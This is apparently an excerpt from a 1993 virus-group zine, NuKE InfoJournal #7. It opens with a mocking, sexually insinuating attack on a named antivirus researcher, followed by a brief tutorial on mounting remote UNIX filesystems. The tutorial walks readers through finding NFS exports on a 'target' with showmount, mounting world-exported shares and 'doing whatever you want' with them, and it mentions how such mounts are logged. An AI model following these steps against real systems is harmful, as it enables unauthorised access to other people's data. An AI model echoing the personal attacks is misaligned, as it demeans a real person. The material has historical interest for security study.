[Oh, I'm a "virus d00d" now Sara, eh?!  Is Dark Avenger a "virus d00d" too?
Or does that label apply only to men you don't sleep with?!  Are you trying
to imply at Pure Energy is a "gal?"  Well, I can assure you that he's not,
I've spoken with him many times, and I can assure that he is a male.  Uh oh,
maybe I shouldn't have said that, now she'll probably be after you P.E.! -NM]

JB> send you a small collection of 43 files that originated from
JB> Soloman's lab... check them out for yourself, but daggone girl, y'all
JB> ask me to stop posting these little messages, how about a tiny bit of
JB> help in this area...

if its ok by me. c'mon john. you promised to send me you viruses a long
time ago so i could use them in my evaluations project. i've been working,
doing - real - work, all this time, while you have been setting up you nuke
the world, nuke this and nuke that. i doubt youd want the general public to
see what goes on there. im so sick of it and by it that i dont even read what
those guys send me from it any more. i dont know how you can look in the
mirror after some of the stunts you pull.

[No, no, no Miss Gordon, _personally_ we don't know how _you_ can look in the
 mirror after all theses stunts _you_ pull. You only fantasize about our stunts,
 please let them be publicly known, as we have let your stunts be publicly
 known. I'm afraid you can't do it, as we don't pull "stunts."  Only you Sara.]

ill check out anything you send me, but i don't believe you anymore. not for
a minute. if you were who you say you are, and were really concerned about
the cyberspace environment, you would not say some of the things you say,
creating more confusion, accusing good decent people of things that they
don't do.

[The only confusion here is your change of attitude, Miss Gordon.]

and by the way, 'infiltrate' is not -my- word. i didn't write it and the
editor has issued a -retraction-

["Infiltrate" not your style? Right, isn't that a requisite course for those
 associated with .mil (military)! Yes, I can see it now, this is truly a
 conspiracy in the making. Can't you governmental people do anything right?]

                            Rock Steady/NuKE
          uK                                                       E-
          E-      "An E-Z Guide To Remote UNIX Disk Mounting"      Nu
          Nu                                                       KE
          KE                         By                            -N
          -N                                                       uK
          uK                         Lvx                           E-
          E-                                                       Nu

NuKE InfoJournal #7
August 1993

% An E-Z Guide to Remote UNIX Disk Mounting %

Remote disk mounting on UNIX systems requires root access on the base      
system.  The procedure is as follows:                                      
1. Create a temporary directory (/tmp/lame in this example).               
2. Query target with "showmount -e host.addr.addr".                        
     This will illuminate you as to which (if any) filesystems may be      
     mounted from your machine.  It will reply with:                       
           hostname:/directory/directory  -options                         
     where options are the mounting options (rw, ro), who may access       
     (host1:host2:...) and other sundry niceities.                         
     showmount -e hostname uses mountd on the remote to read the remote's  
     If your machine is listed in the access field, or if access reads     
     "everyone," you may mount that filesystem.                            
3. Pick a filesystem you would like to mount.  Remember that you can       
   mount the subdierctories of the mountable directories.                  
4. Mount the filesystem.                                                   
     mount hostname:/filesystem/remote /tmp/lame                           
5. Do whatever you want with the filesystem.                               
6. Unmount the filesystem.                                                 
     umount /tmp/lame  OR  #umount hostname:/filesystem/remote             
     - You must leave the directory you are unmounting.                    
     - ALL mounts (failed or successful) are noted in /etc/rmtab on        
       the remote system.  /etc/rmtab remains until purged.                
     - You must specify full pathnames when mounting and unmounting.       
     - An entry of "/filesystem/directory       " with no options in       
       a host's /etc/exports will allow world-mounting of that system.     
     - Remote mounting often uses RPC and NFS.  It will work most          
       often on Suns and workstations networked with Suns (ie: using NFS). 

[Note:  Lvx can be contacted at The Hell Pit +1 708 459 7267 or at
Nitro Burnin' Funny Cars +1 312 582 1115.  -NM]
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